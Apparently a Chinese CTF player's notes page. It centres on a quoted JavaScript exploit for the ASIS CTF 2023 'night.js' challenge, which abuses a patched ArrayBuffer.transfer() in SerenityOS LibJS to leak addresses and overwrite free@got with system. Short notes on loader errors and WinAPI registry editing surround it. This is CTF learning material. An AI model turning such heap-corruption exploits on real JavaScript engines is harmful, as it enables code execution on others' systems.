
Nightjs

pathlib 文件系统路径,支持多平台

File too short

可能是没有权限（不过动态链接器报 "file too short"，一般是指这个 .so 文件本身被截断、比 ELF 头还小，而不是权限问题）

root@594f7280f663:/home/pwn# LD_LIBRARY_PATH=/libjs/ timeout 3 ./js
./js: error while loading shared libraries: /libjs/liblagom-js.so.0: file too short

有一个 git diff 结果文件

原版在这里 serenity/Userland/Utilities/js.cpp，看不懂 cpp

偷来 crazyman 的 wp

// Exploit script quoted from crazyman's writeup, run against the patched
// LibJS `js` binary inside the CTF container. Every numeric offset below is
// hard-coded for that one liblagom-js.so / libc build and is meaningless for
// any other binary. All top-level names are implicit globals (no const/let);
// harmless in a one-shot script, but do not copy the pattern.
buffer_array = []   // first batch: 0x120-byte ArrayBuffers
spray_array = []    // second batch: 0x160-byte ArrayBuffers, allocated after the transfer

// for(let i = 0; i < 0x10; i++) {
//     spray_array.push(new ArrayBuffer(0x50))
// }

// Allocate 0x30 buffers so that one from the middle of the batch has
// neighbours on both sides (allocation order matters here; do not reorder).
for(let i = 0; i < 0x30; i++) {
    // spray_array.push(new ArrayBuffer(0x50))
    buffer_array.push(new ArrayBuffer(0x120))
}
buffer = buffer_array[0x1f]   // one buffer from the middle of the batch
view = new BigUint64Array(buffer)

// Fill the first seven qwords. The page does not explain these values;
// presumably they shape how the backing memory looks once it is reused —
// confirm against the js.cpp diff the writeup refers to.
view[0] = 0n;
view[1] = 1n;
view[2] = 2n;
view[3] = 3n;
view[4] = 0x100n;
view[5] = 1n;
view[6] = 1n;

// transfer() shrinks the buffer to 0x20 bytes. The original `view` is still
// written to at the end of the script, and view2 below is indexed far past
// 0x20 bytes, so the bug being exploited appears to be in how this patched
// transfer() treats the old and new backing stores. The actual patch is in
// the git diff mentioned above, which is not shown on this page.
buffer2 = buffer.transfer(0x20)
console.log(buffer2.byteLength)   // sanity check on what transfer() reported

// Spray 0x30 larger buffers and stamp each with a marker constant so that the
// one overlapping buffer2 can be recognised (the constant's meaning is not
// stated on the page).
for(let i = 0; i < 0x30; i++) {
    spray_array.push(new ArrayBuffer(0x160))
}
for(let i = 0; i < 0x30; i++) {
    v = new BigUint64Array(spray_array[i])
    v[0] = 16653634245063215n
}
// A 0x20-byte buffer holds only 4 qwords; indices 8, 10 and 16 are beyond it,
// so these accesses only work because of the bug above. The qwords read here
// are treated as pointers into liblagom-js and the heap; the subtracted
// constant turns the leaked pointer into the library base for this build only.
view2 = new BigUint64Array(buffer2)
liblagomjsbase = view2[8]-0x67dda8n
heapbase = view2[10]
console.log("leak liblagom-js: "+view2[8].toString(16))
console.log("leak heap: "+heapbase.toString(16))

// Writing view2[16] and then reading spray_array[0] through a fresh view is
// the script's own "arbitrary read" test, so view2[16] presumably overlaps
// the data pointer of spray_array[0] — not verifiable from this page.
view2[16] = liblagomjsbase
// test arbitrary read
v = new BigUint64Array(spray_array[0])
console.log(v[0].toString(16))

// Build-specific offsets: free@got in liblagom-js, then free and system in
// the container's libc (derived from the value read out of the GOT).
freegot = liblagomjsbase+0x69b420n
view2[16] = freegot
libcbase = v[0]-0xa8780n
system = libcbase+0x55230n
console.log(freegot.toString(16))
console.log(libcbase.toString(16))

v[0] = system; //libcbase+0x1105f2n // overwrite free@got in liblagom-js
// Same seven qwords as before, re-applied through the stale `view` on the
// already-transferred buffer; why this is needed a second time is not
// explained on the page.
view[0] = 0n;
view[1] = 1n;
view[2] = 2n;
view[3] = 3n;
view[4] = 0x100n;
view[5] = 1n;
view[6] = 1n;

// spray_array = vshell
// Another fixed libc offset; the page does not say what it points at, and the
// trailing commented-out number looks like a leftover from an earlier attempt.
view2[16] = libcbase+0x1c040cn//l29400045130965551n


// Final allocation; presumably this drives the allocator into a free() that
// now resolves to system. The page shows no output for this step.
shell = new ArrayBuffer(0x1000)

Asis CTF 2023 - night.js exploit

冲浪发现学长 blog TCTF-final-Promise-JSpwn题解 | A1ex’s Blog

写一个 cpp 的小东西

想写一个修改注册表的小玩意,但是 winapi 的那些名词不清不楚的,直到看到了这个才明白

如果返回 ERROR_ACCESS_DENIED，那就是没有以管理员身份运行

写好了 commandline 的格式,感觉不如直接写 reg 文件…

Winapi 函数后缀